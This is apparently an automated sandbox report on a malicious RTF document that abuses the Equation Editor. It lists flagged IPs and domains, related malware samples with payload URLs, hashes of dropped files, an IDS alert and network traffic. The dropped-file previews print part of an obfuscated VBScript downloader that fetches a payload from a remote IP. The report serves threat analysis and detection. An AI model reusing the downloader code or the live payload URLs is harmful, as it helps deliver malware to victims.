    http://crl.entrust.net/2048ca.crl0powershell.exe, 00000006.00000002.359414442.0000000004FCC000.00000004.00000020.00020000.00000000.sdmpfalse
    • URL Reputation: safe
    unknown
    • No. of IPs < 25%
    • 25% < No. of IPs < 50%
    • 50% < No. of IPs < 75%
    • 75% < No. of IPs
    IPDomainCountryFlagASNASN NameMalicious
    91.92.254.29
    unknownBulgaria
    34368THEZONEBGtrue
    23.95.235.16
    unknownUnited States
    36352AS-COLOCROSSINGUStrue
    188.114.96.3
    uploaddeimagens.com.brEuropean Union
    13335CLOUDFLARENETUStrue
    Joe Sandbox version:40.0.0 Tourmaline
    Analysis ID:1466761
    Start date and time:2024-07-03 11:07:53 +02:00
    Joe Sandbox product:CloudBasic
    Overall analysis duration:0h 4m 32s
    Hypervisor based Inspection enabled:false
    Report type:full
    Cookbook file name:defaultwindowsofficecookbook.jbs
    Analysis system description:Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
    Number of analysed new started processes analysed:12
    Number of new started drivers analysed:0
    Number of existing processes analysed:0
    Number of existing drivers analysed:0
    Number of injected processes analysed:0
    Technologies:
    • HCA enabled
    • EGA enabled
    • AMSI enabled
    Analysis Mode:default
    Analysis stop reason:Timeout
    Sample name:4YlwTsmpuZ.rtf
    renamed because original name is a hash value
    Original Sample Name:9904916ce3549610216e99d83e7e2135.rtf
    Detection:MAL
    Classification:mal100.expl.evad.winRTF@7/12@1/3
    EGA Information:
    • Successful, ratio: 50%
    HCA Information:
    • Successful, ratio: 91%
    • Number of executed functions: 16
    • Number of non-executed functions: 9
    Cookbook Comments:
    • Found application associated with file extension: .rtf
    • Found Word or Excel or PowerPoint or XPS Viewer
    • Attach to Office via COM
    • Active ActiveX Object
    • Scroll down
    • Close Viewer
    • Exclude process from analysis (whitelisted): dllhost.exe, WerFault.exe, WMIADAP.exe, conhost.exe, svchost.exe
    • Execution Graph export aborted for target powershell.exe, PID 3200 because it is empty
    • Not all processes where analyzed, report is missing behavior information
    • Report size exceeded maximum capacity and may have missing behavior information.
    • Report size getting too big, too many NtOpenKeyEx calls found.
    • Report size getting too big, too many NtQueryValueKey calls found.
    TimeTypeDescription
    05:08:38API Interceptor283x Sleep call for process: EQNEDT32.EXE modified
    05:08:41API Interceptor54x Sleep call for process: wscript.exe modified
    05:08:42API Interceptor13x Sleep call for process: powershell.exe modified
    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
    23.95.235.16DHL_AWB 98776013276.xlsGet hashmaliciousFormBookBrowse
    • 23.95.235.16/33011/WDF.txt
    FedEx Receipt_53065724643.xlsGet hashmaliciousFormBookBrowse
    • 23.95.235.16/88077/BNNJ.txt
    statement .xlsGet hashmaliciousUnknownBrowse
    • 23.95.235.16/99122/innovationflowerpicturetoday.gif
    IlWPStOFHj.rtfGet hashmaliciousRemcosBrowse
    • 23.95.235.16/xampp/kob/MMD.txt
    LgTFM1JlJu.rtfGet hashmaliciousAgentTeslaBrowse
    • 23.95.235.16/5656/rcc.txt
    zBtnT85tsF.rtfGet hashmaliciousHTMLPhisherBrowse
    • 23.95.235.16/9088/lionsarejunglelivingalwaysthere.bmp
    SC_TR20240619.xlsGet hashmaliciousAgentTeslaBrowse
    • 23.95.235.16/9088/UHH.txt
    TransferNotice_Technoglass_SA_P240408-6K27VGO.jsGet hashmaliciousUnknownBrowse
    • 23.95.235.16/9022/RVG.txt
    vcb_#20240618000.xlsGet hashmaliciousUnknownBrowse
    • 23.95.235.16/9022/cfo/cbc.doc
    vcb_#20240618000.xlsGet hashmaliciousUnknownBrowse
    • 23.95.235.16/9022/cfo/cbc.doc
    188.114.96.3Adjunto confirmacion de pedido.exeGet hashmaliciousDBatLoader, FormBookBrowse
    • www.coinwab.com/kqqj/
    aAEsSBx24sxHhRz.exeGet hashmaliciousFormBookBrowse
    • www.camperelektrikde.shop/dy13/?GdIHAFZ=8bNdgr3QvPw6/pDIZNt+55DvjzemDI0RO+pYD3qlulbIe6f7Sn3K06Z4F4Tg3hK83Y0/&BhU=5jl0ddZhNnYlOrV0
    http://sp.26skins.com/steamstore/category/adventure_rpg/?snr=1_5_9__12Get hashmaliciousUnknownBrowse
    • sp.26skins.com/favicon.ico
    30Fqen2Bu3.exeGet hashmaliciousUnknownBrowse
    • filetransfer.io/data-package/TbaYPT0S/download
    30Fqen2Bu3.exeGet hashmaliciousUnknownBrowse
    • filetransfer.io/data-package/TbaYPT0S/download
    Vg46FzGtNo.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
    • 000366cm.nyashka.top/phpflowergenerator.php
    QUOTATION_JULQTRA071244#U00faPDF.scr.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
    • filetransfer.io/data-package/mHgyHEv5/download
    file.exeGet hashmaliciousFormBookBrowse
    • www.cavetta.org.mt/yhnb/
    http://johnlewisfr.comGet hashmaliciousUnknownBrowse
    • johnlewisfr.com/
    cL7A9wGE3w.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
    • 445798cm.nyashka.top/ProviderEternalLinephpRequestSecurePacketprocessauthwordpress.php
    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
    uploaddeimagens.com.brDHL_AWB 98776013276.xlsGet hashmaliciousFormBookBrowse
    • 188.114.96.3
    orden de compra.xlam.xlsxGet hashmaliciousAgentTeslaBrowse
    • 188.114.96.3
    FedEx Receipt_53065724643.xlsGet hashmaliciousFormBookBrowse
    • 188.114.96.3
    zahtjev za ponudu.xlsGet hashmaliciousUnknownBrowse
    • 188.114.97.3
    INQUIRY#809676-JULY1.xla.xlsxGet hashmaliciousUnknownBrowse
    • 188.114.96.3
    SecuriteInfo.com.Exploit.ShellCode.69.26008.28945.rtfGet hashmaliciousRemcosBrowse
    • 188.114.96.3
    SecuriteInfo.com.Exploit.ShellCode.69.25469.24539.rtfGet hashmaliciousUnknownBrowse
    • 188.114.96.3
    gFTk7fAh55.rtfGet hashmaliciousUnknownBrowse
    • 188.114.97.3
    Comprobante_786765456776780879878968.vbsGet hashmaliciousAgentTeslaBrowse
    • 188.114.97.3
    Product Inquiry_#466788.xlsGet hashmaliciousFormBookBrowse
    • 188.114.96.3
    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
    THEZONEBG02_07_2024_D#U00f6nemi_MEVDUAT Ekstre Bilgiler.exeGet hashmaliciousAsyncRATBrowse
    • 91.92.240.178
    JrBo2dgrUX.exeGet hashmaliciousLokibotBrowse
    • 91.92.240.69
    DHL_AWB 98776013276.xlsGet hashmaliciousFormBookBrowse
    • 91.92.254.14
    457525.xlsGet hashmaliciousUnknownBrowse
    • 91.92.254.14
    Scan-Payment-Advice.xlsGet hashmaliciousLokibotBrowse
    • 91.92.240.69
    dk3M4juckj.exeGet hashmaliciousDanaBotBrowse
    • 91.92.246.63
    dk3M4juckj.exeGet hashmaliciousDanaBotBrowse
    • 91.92.246.63
    je7RnKrgQO.exeGet hashmaliciousPureLog Stealer, zgRATBrowse
    • 91.92.255.36
    List of Required items and services.zipGet hashmaliciousGuLoader, RHADAMANTHYSBrowse
    • 91.92.242.245
    YE40Payment3-R30819-38AIEY-39POIA-29102ND-K5920O-AO30382.exeGet hashmaliciousPureLog Stealer, zgRATBrowse
    • 91.92.255.36
    AS-COLOCROSSINGUSPayment_Advice.xlsGet hashmaliciousUnknownBrowse
    • 192.3.179.150
    DHL_AWB 98776013276.xlsGet hashmaliciousFormBookBrowse
    • 23.95.235.16
    Scan-Payment-Advice.xlsGet hashmaliciousLokibotBrowse
    • 198.46.178.137
    orden de compra.xlam.xlsxGet hashmaliciousAgentTeslaBrowse
    • 192.3.243.156
    ORDER-7019-2024.jsGet hashmaliciousAgentTeslaBrowse
    • 192.210.215.11
    PO-24701248890.jsGet hashmaliciousWSHRatBrowse
    • 192.210.215.11
    FedEx Receipt_53065724643.xlsGet hashmaliciousFormBookBrowse
    • 23.95.235.16
    statement .xlsGet hashmaliciousUnknownBrowse
    • 23.95.235.16
    EY8qnRKXcx.rtfGet hashmaliciousLokibotBrowse
    • 198.46.178.137
    Scan_Hsbc_Payment_advice.xlsGet hashmaliciousLokibotBrowse
    • 198.46.178.137
    CLOUDFLARENETUSHSBCscancopy-invoice778483-payment87476MT103.exeGet hashmaliciousFormBookBrowse
    • 104.21.21.230
    https://www.mediafire.com/file/9gqqmzveuoh1gqc/Confirmation+of+Payment.tgz/fileGet hashmaliciousAgentTeslaBrowse
    • 104.16.113.74
    #U00f6deme makbuzunu onayla.exeGet hashmaliciousLokibotBrowse
    • 104.21.76.60
    PI and payment confirmed pdf.exeGet hashmaliciousAgentTeslaBrowse
    • 104.26.12.205
    https://developers.foxit.com/Get hashmaliciousUnknownBrowse
    • 104.26.9.44
    https://hr.economictimes.indiatimes.com/etl.php?url=https://hr.economictimes.indiatimes.com/etl.php?url=//bgvhdjcbjfdhjkbgfddgfghgfd.pages.dev/#?email=dGVzdEB0ZXN0by5jb20=Get hashmaliciousHTMLPhisherBrowse
    • 104.17.2.184
    _Account Receipt.PDF.exeGet hashmaliciousAgentTeslaBrowse
    • 104.26.13.205
    https://hr.economictimes.indiatimes.com/etl.php?url=https://hr.economictimes.indiatimes.com/etl.php?url=//bgvhdjcbjfdhjkbgfddgfghgfd.pages.dev/#?email=dGVzdEB0ZXN0by5jb20=Get hashmaliciousUnknownBrowse
    • 188.114.96.3
    https://links-1.govdelivery.com/CL0/https:%2F%2Fapps.twc.texas.gov%2FUITAXSERV%2Fsecurity%2Flogon.do/1/010001906eac4a95-b32fd906-841f-4d3d-bf3f-0569a7b84779-000000/O1ha5mDxEioEFSm7quIZI3ZzUwAXbJrANNcKESvCj7U=359Get hashmaliciousUnknownBrowse
    • 1.1.1.1
    http://www.splendidcare.sa.com/Juwqdh/xacwk5957irfeugd/FW2HGOqFbIVQssWaWxsuPFbxoA78Qv8umKJQmKBGMM0/enpkwYwNDdxjXCgjy64rbJkHYw5eTv2C-VSAAV3Fufzkb2cfb573zE5R9OTtHCML20yl9BXVgVz_5eGAS31RGQGet hashmaliciousUnknownBrowse
    • 104.17.2.184
    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
    05af1f5ca1b87cc9cc9b25185115607dPayment_Advice.xlsGet hashmaliciousUnknownBrowse
    • 188.114.96.3
    DHL_AWB 98776013276.xlsGet hashmaliciousFormBookBrowse
    • 188.114.96.3
    orden de compra.xlam.xlsxGet hashmaliciousAgentTeslaBrowse
    • 188.114.96.3
    FedEx Receipt_53065724643.xlsGet hashmaliciousFormBookBrowse
    • 188.114.96.3
    statement .xlsGet hashmaliciousUnknownBrowse
    • 188.114.96.3
    Bank Slip 2.docGet hashmaliciousSnake KeyloggerBrowse
    • 188.114.96.3
    Scan_Hsbc_Payment_advice.xlsGet hashmaliciousLokibotBrowse
    • 188.114.96.3
    INQUIRY#809676-JULY1.xla.xlsxGet hashmaliciousRemcosBrowse
    • 188.114.96.3
    20240506_12082.xlsGet hashmaliciousUnknownBrowse
    • 188.114.96.3
    INQUIRY#809676-JULY1.xla.xlsxGet hashmaliciousRemcosBrowse
    • 188.114.96.3
    No context
    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    File Type:data
    Category:dropped
    Size (bytes):64
    Entropy (8bit):0.34726597513537405
    Encrypted:false
    SSDEEP:3:Nlll:Nll
    MD5:446DD1CF97EABA21CF14D03AEBC79F27
    SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
    SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
    SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
    Malicious:false
    Reputation:high, very likely benign file
    Preview:@...e...........................................................
    Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
    File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
    Category:dropped
    Size (bytes):3490
    Entropy (8bit):3.6988434778887034
    Encrypted:false
    SSDEEP:96:g0kltIiY6Yij0kltRET8yT8LT8VH0klt+T80:5stIiei4stOR8+Ust+j
    MD5:397C3C538435534590D14E1F5C9149C6
    SHA1:00D4EF9859A20F9CBC444A7AB4E6EDF9BE4D19FB
    SHA-256:1F0991AE33597D73D6CF48C3ED6BECE4423BF2393A4E85EB1B84DFE773CD734F
    SHA-512:A8AF6B3E116C8C1CFEF703F88C8798DC095D448664A57C1B6D9589CB6330C3F18835C1DAD49810CA59667695696E374FE24F2DCFB325BAB6E819FBFE57F3C996
    Malicious:false
    Reputation:low
    Preview:..D.i.m. .i.L.G.L.p.Z.L.Q.G.K.J.N.c.b.K.P.c.q.Z.N.P.c.k.N.G.K.N.P.u.n.K.N.a.c.v.K.Z.K.n.d.G.L.Z.K.a.W.W.C.L.f.k.l.P.c.m.b.n.a.L.W.h.N.I.Z.a.Q.c.t.k.J.W.G.B.c.d.l.U.i.Z.W.A.h.x.L.Q.d.K.l.R.B.A.i.L.f.J.K.K.Q.c.W.,. .R.v.g.o.z.C.N.L.B.U.O.L.A.l.G.W.d.e.L.p.u.G.p.W.q.r.P.B.c.c.u.i.t.b.G.W.f.W.k.R.u.U.z.K.O.x.x.R.i.o.U.K.W.a.L.B.W.p.S.U.v.B.T.c.S.q.n.b.f.Z.o.W.b.p.P.k.Z.d.N.q.L.j.c.L.Z.G.a.i.G.G.a.W.r.i.G.e.d.A.z.i.....S.e.t. .i.L.G.L.p.Z.L.Q.G.K.J.N.c.b.K.P.c.q.Z.N.P.c.k.N.G.K.N.P.u.n.K.N.a.c.v.K.Z.K.n.d.G.L.Z.K.a.W.W.C.L.f.k.l.P.c.m.b.n.a.L.W.h.N.I.Z.a.Q.c.t.k.J.W.G.B.c.d.l.U.i.Z.W.A.h.x.L.Q.d.K.l.R.B.A.i.L.f.J.K.K.Q.c.W. .=. .C.r.e.a.t.e.O.b.j.e.c.t.(.".M.S.X.M.L.2...S.e.r.v.e.r.X.M.L.H.T.T.P.".).....i.L.G.L.p.Z.L.Q.G.K.J.N.c.b.K.P.c.q.Z.N.P.c.k.N.G.K.N.P.u.n.K.N.a.c.v.K.Z.K.n.d.G.L.Z.K.a.W.W.C.L.f.k.l.P.c.m.b.n.a.L.W.h.N.I.Z.a.Q.c.t.k.J.W.G.B.c.d.l.U.i.Z.W.A.h.x.L.Q.d.K.l.R.B.A.i.L.f.J.K.K.Q.c.W...O.p.e.n. .".G.E.T.".,. .".h.t.t.p.:././.9.1...9.2...2.5.4...2.9./.U.s.e.r.s._.A.P.I./.s.y.
    Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
    File Type:data
    Category:dropped
    Size (bytes):16384
    Entropy (8bit):0.0
    Encrypted:false
    SSDEEP:3::
    MD5:CE338FE6899778AACFC28414F2D9498B
    SHA1:897256B6709E1A4DA9DABA92B6BDE39CCFCCD8C1
    SHA-256:4FE7B59AF6DE3B665B67788CC2F99892AB827EFAE3A467342B3BB4E3BC8E5BFE
    SHA-512:6EB7F16CF7AFCABE9BDEA88BDAB0469A7937EB715ADA9DFD8F428D9D38D86133945F5F2F2688DDD96062223A39B5D47F07AFC3C48D9DB1D5EE3F41C8D274DCCF
    Malicious:false
    Reputation:high, very likely benign file
    Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
    Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
    File Type:data
    Category:dropped
    Size (bytes):14336
    Entropy (8bit):3.6042375496492554
    Encrypted:false
    SSDEEP:384:VuVdKRL2/9Uja4gTYckw/OEjqay7B6vfGuv/N6QFLggpvi7iLJ:QmyFU+F6A9jit6vOEgaZvBJ
    MD5:507E181B72FB351F53791A9966347D20
    SHA1:E9FF7C875EE16ABC6F5E14F8F8AF1F0FE13F1ABF
    SHA-256:FE9E7B953C2FEE16F5C923A36CBD71858E8ACC8A9985F1720441D99709455040
    SHA-512:2617F14C967C1D3532E74B30AF8C8136AA0DCB8F3D659026793FB63F53735EB0B8CFF78BF5074B22A0EC9B9C4BA547DA7FA2FC6644941794DE745826CA31BE25
    Malicious:false
    Reputation:low
    Preview:....\.9.5.5.3.7.7.1.7.#.2.#.].=.?...?.$.;.`.^.~.?.9.^.&.2.0.1.+.<.+.2.2.[.@...%.|.|.-.?._.#.?.1._.7.~.5.].%.!.;.>.^.5.7.6.>.?.[.).!.#.9.%.?.,./...=.!.).$.0.9.9.0.#.(.$.0.6.-.6.?.9.^.].=.?.$.[.2./.2.).!.2.[.,._.).?.,.8.|.6.?...?.#.].....1.&...`...).<.?.4.&.].?.1.;...%.?.~.:./...........=.>...-.5.5.7...%.=.^.=.*.%.%.1.2.].|.~.,.=.`.9.[.1.,.?.$.?.5.5.$.?.'.[.:.8.6.=.?.+.(.=._.[._.5.4.[./.3.:...%.?.?.].;.^.8.=./.0.+.7.?.*.^.#.>.&._.&.=.,.?.|.@.!...?.-.0.?.-.~.?.5.&.:.*...0.>.$.$.?.~.].@.1.$.4.4.`...2.^.1.&.!.3...).$.;.;.:.&./.?.7.?.]...<.+.:.<.@.?.?.~.[.6.?.%.`.:.%.8.3.=.$._.%...0.#.-...?.<.5.1.<.6.].;...%.]./._.?.7.;.'.<.|.[.7.&.~.(...?.).,.=.#.0.?.|.[.1.$.7.1.$.?.~.?.*.;.8.9.<.?.~.<.6.3.?.2.&.*.[.!.(.'.&.$.3.;.....?.|.@.?.>.+...?...&.#...-.7.?.?.).%.-.?.;.]...0.<...~...6.0.@.>.@.=.?.6.?.0.6.,._.?.5.9.`._.^.?.~.#.*.].=.<.*.>.4.'.+.<.'.5.|.].|.[.6...?./...|.<.6.8.0.[.@.?.(./.?.1.^.,.:.@.|./.?./.%.?.=...%...:.?...-...6.=.?...?.*.5.1.*.$.?.&.?.].|.>.-.1.'.7.~.3.9...;.|.%.(.(.@.1.[.4.?.4.6.6.
    Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
    File Type:data
    Category:dropped
    Size (bytes):1024
    Entropy (8bit):0.05390218305374581
    Encrypted:false
    SSDEEP:3:ol3lYdn:4Wn
    MD5:5D4D94EE7E06BBB0AF9584119797B23A
    SHA1:DBB111419C704F116EFA8E72471DD83E86E49677
    SHA-256:4826C0D860AF884D3343CA6460B0006A7A2CE7DBCCC4D743208585D997CC5FD1
    SHA-512:95F83AE84CAFCCED5EAF504546725C34D5F9710E5CA2D11761486970F2FBECCB25F9CF50BBFC272BD75E1A66A18B7783F09E1C1454AFDA519624BC2BB2F28BA4
    Malicious:false
    Reputation:high, very likely benign file
    Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    File Type:very short file (no magic)
    Category:dropped
    Size (bytes):1
    Entropy (8bit):0.0
    Encrypted:false
    SSDEEP:3:U:U
    MD5:C4CA4238A0B923820DCC509A6F75849B
    SHA1:356A192B7913B04C54574D18C28D46E6395428AB
    SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
    SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
    Malicious:false
    Preview:1
    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    File Type:very short file (no magic)
    Category:dropped
    Size (bytes):1
    Entropy (8bit):0.0
    Encrypted:false
    SSDEEP:3:U:U
    MD5:C4CA4238A0B923820DCC509A6F75849B
    SHA1:356A192B7913B04C54574D18C28D46E6395428AB
    SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
    SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
    Malicious:false
    Preview:1
    Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
    File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Fri Aug 11 15:42:05 2023, mtime=Fri Aug 11 15:42:05 2023, atime=Wed Jul 3 08:08:36 2024, length=197186, window=hide
    Category:dropped
    Size (bytes):1014
    Entropy (8bit):4.54524586560401
    Encrypted:false
    SSDEEP:12:81mRgFgXg/XAlCPCHaXplKB5B/Dr8xX+WtT/bqsO0+/oicvbUhs4VG+/kDtZ3YiF:8sm/XTbKPxOv1u/becJB/kDv3qwtik7N
    MD5:46C8C76E3E5A22FC28944967F20E8A78
    SHA1:9410A1BAB97504122A4EFE18A58E121C74B625CC
    SHA-256:D86A4D94C0B29425B4EB8FC2C35F028BCD402E83E2AA1D495F512E28B8CD1CDB
    SHA-512:8CFE3F06E719B021F3BE53527B2B44B074ADBF3825A9F690931DB2E5F0AA1FF3C8CDFDF1B3F33DF5E807C6C636D2DC61378C32D0E9C3ABD553C8C04C1E7EE0B0
    Malicious:false
    Preview:L..................F.... ....*.r....*.r....3u.(...B............................P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X*...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1......X.I..user.8......QK.X.X.I*...&=....U...............A.l.b.u.s.....z.1......WD...Desktop.d......QK.X.WD.*..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.....f.2.B....X.I .4YLWTS~1.RTF..J.......WC..WC.*.........................4.Y.l.w.T.s.m.p.u.Z...r.t.f.......x...............-...8...[............?J......C:\Users\..#...................\\506013\Users.user\Desktop\4YlwTsmpuZ.rtf.%.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.4.Y.l.w.T.s.m.p.u.Z...r.t.f.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6.............`.......X.......506013..........D_....3N...W...9.W.e8...8.....[D_....3N...W...9.W.e8
    Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
    File Type:Generic INItialization configuration [folders]
    Category:dropped
    Size (bytes):55
    Entropy (8bit):4.626636531627805
    Encrypted:false
    SSDEEP:3:H3Ji6/om4H6/ov:H3h/v/y
    MD5:5BDAD84EF82636D5736842972516F162
    SHA1:2C47CB9A1C4A9C2550FA2D08402298542C2EE4A5
    SHA-256:CE60D29C370CE2649270C029F62D93CAE20DA481C791F92E1949AA5EE8C639E2
    SHA-512:86B332FE006E8F542C4B7CD920AC2686A264597FD1C249376524D3C994E14BFB2C3D28B4905E6B26D3DC40806C40C9B0649D9FA0026CCEE15625818EDFB45582
    Malicious:false
    Preview:[misc]..4YlwTsmpuZ.LNK=0..[folders]..4YlwTsmpuZ.LNK=0..
    Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
    File Type:data
    Category:dropped
    Size (bytes):162
    Entropy (8bit):2.4797606462020307
    Encrypted:false
    SSDEEP:3:vrJlaCkWtVyHlqlzl0pbklMWjV4lc+/dllln:vdsCkWtWYlz21kF2JV/l
    MD5:2CF7D3B8DED3F1D5CE1AC92F3E51D4ED
    SHA1:95E13378EA9CACA068B2687F01E9EF13F56627C2
    SHA-256:60DF94CDE4FD9B4A73BB13775079D75CE954B75DED5A2878277FA64AD767CAB1
    SHA-512:2D5797FBBE44766D93A5DE3D92911358C70D8BE60D5DF542ECEDB77D1195DC1EEF85E4CA1445595BE81550335A20AB3F11B512385FE20F75B1E269D6AB048E0A
    Malicious:false
    Preview:.user..................................................A.l.b.u.s.............p........1...............2..............@3...............3......z.......p4......x...
    Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
    File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
    Category:dropped
    Size (bytes):3490
    Entropy (8bit):3.6988434778887034
    Encrypted:false
    SSDEEP:96:g0kltIiY6Yij0kltRET8yT8LT8VH0klt+T80:5stIiei4stOR8+Ust+j
    MD5:397C3C538435534590D14E1F5C9149C6
    SHA1:00D4EF9859A20F9CBC444A7AB4E6EDF9BE4D19FB
    SHA-256:1F0991AE33597D73D6CF48C3ED6BECE4423BF2393A4E85EB1B84DFE773CD734F
    SHA-512:A8AF6B3E116C8C1CFEF703F88C8798DC095D448664A57C1B6D9589CB6330C3F18835C1DAD49810CA59667695696E374FE24F2DCFB325BAB6E819FBFE57F3C996
    Malicious:true
    Preview:..D.i.m. .i.L.G.L.p.Z.L.Q.G.K.J.N.c.b.K.P.c.q.Z.N.P.c.k.N.G.K.N.P.u.n.K.N.a.c.v.K.Z.K.n.d.G.L.Z.K.a.W.W.C.L.f.k.l.P.c.m.b.n.a.L.W.h.N.I.Z.a.Q.c.t.k.J.W.G.B.c.d.l.U.i.Z.W.A.h.x.L.Q.d.K.l.R.B.A.i.L.f.J.K.K.Q.c.W.,. .R.v.g.o.z.C.N.L.B.U.O.L.A.l.G.W.d.e.L.p.u.G.p.W.q.r.P.B.c.c.u.i.t.b.G.W.f.W.k.R.u.U.z.K.O.x.x.R.i.o.U.K.W.a.L.B.W.p.S.U.v.B.T.c.S.q.n.b.f.Z.o.W.b.p.P.k.Z.d.N.q.L.j.c.L.Z.G.a.i.G.G.a.W.r.i.G.e.d.A.z.i.....S.e.t. .i.L.G.L.p.Z.L.Q.G.K.J.N.c.b.K.P.c.q.Z.N.P.c.k.N.G.K.N.P.u.n.K.N.a.c.v.K.Z.K.n.d.G.L.Z.K.a.W.W.C.L.f.k.l.P.c.m.b.n.a.L.W.h.N.I.Z.a.Q.c.t.k.J.W.G.B.c.d.l.U.i.Z.W.A.h.x.L.Q.d.K.l.R.B.A.i.L.f.J.K.K.Q.c.W. .=. .C.r.e.a.t.e.O.b.j.e.c.t.(.".M.S.X.M.L.2...S.e.r.v.e.r.X.M.L.H.T.T.P.".).....i.L.G.L.p.Z.L.Q.G.K.J.N.c.b.K.P.c.q.Z.N.P.c.k.N.G.K.N.P.u.n.K.N.a.c.v.K.Z.K.n.d.G.L.Z.K.a.W.W.C.L.f.k.l.P.c.m.b.n.a.L.W.h.N.I.Z.a.Q.c.t.k.J.W.G.B.c.d.l.U.i.Z.W.A.h.x.L.Q.d.K.l.R.B.A.i.L.f.J.K.K.Q.c.W...O.p.e.n. .".G.E.T.".,. .".h.t.t.p.:././.9.1...9.2...2.5.4...2.9./.U.s.e.r.s._.A.P.I./.s.y.
    Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
    File Type:data
    Category:dropped
    Size (bytes):162
    Entropy (8bit):2.4797606462020307
    Encrypted:false
    SSDEEP:3:vrJlaCkWtVyHlqlzl0pbklMWjV4lc+/dllln:vdsCkWtWYlz21kF2JV/l
    MD5:2CF7D3B8DED3F1D5CE1AC92F3E51D4ED
    SHA1:95E13378EA9CACA068B2687F01E9EF13F56627C2
    SHA-256:60DF94CDE4FD9B4A73BB13775079D75CE954B75DED5A2878277FA64AD767CAB1
    SHA-512:2D5797FBBE44766D93A5DE3D92911358C70D8BE60D5DF542ECEDB77D1195DC1EEF85E4CA1445595BE81550335A20AB3F11B512385FE20F75B1E269D6AB048E0A
    Malicious:false
    Preview:.user..................................................A.l.b.u.s.............p........1...............2..............@3...............3......z.......p4......x...
    File type:Rich Text Format data, version 1
    Entropy (8bit):2.208657330150951
    TrID:
    • Rich Text Format (5005/1) 55.56%
    • Rich Text Format (4004/1) 44.44%
    File name:4YlwTsmpuZ.rtf
    File size:197'186 bytes
    MD5:9904916ce3549610216e99d83e7e2135
    SHA1:d5eefab14ee9d5afa6258d3b399b46f779a56901
    SHA256:a887cfb81844497f8f88e558289f89d8edb3f277f142df636f5267cc8263d198
    SHA512:80394d4188c11d8eac637e3d498ee15847ebf362740663092214eb7a102cf49fd1ef6bda6e39a1ec40b86f127f105ac165aebe406a14ed1b6780a99c438e0b28
    SSDEEP:6144:fGozULk4BPR11NU9TlhrCoSHvE+QO5Sk7:M
    TLSH:DB145D2EE70F0958DF55A7B7435A4A4A06FCB33DB34140B179AC973437AD82E4A6287C
    File Content Preview:{\rtf1.......{\*\fldinst514321024 \|}.{\595537717#2#]=?.?$;`^~?9^&201+<+22[@.%||-?_#?1_7~5]%!;>^576>?[)!#9%?,/.=!)$0990#($06-6?9^]=?$[2/2)!2[,_)?,8|6?.?#]..1&.`.)<?4&]?1;.%?~:/.....=>.-557.%=^=*%%12]|~,=`9[1,?$?55$?'[:86=?+(=_[_54[/3:.%??];^8=/0+7?*^#>&_&
    Icon Hash:2764a3aaaeb7bdbf
    IdStartFormat IDFormatClassnameDatasizeFilenameSourcepathTemppathExploit
    000001ADDhno
    TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
    07/03/24-11:08:43.238447TCP2049038ET TROJAN Malicious Base64 Encoded Payload In Image804916291.92.254.29192.168.2.22
    TimestampSource PortDest PortSource IPDest IP
    Jul 3, 2024 11:08:41.733712912 CEST4916180192.168.2.2223.95.235.16
    Jul 3, 2024 11:08:41.738675117 CEST804916123.95.235.16192.168.2.22
    Jul 3, 2024 11:08:41.738780975 CEST4916180192.168.2.2223.95.235.16
    Jul 3, 2024 11:08:41.739130020 CEST4916180192.168.2.2223.95.235.16
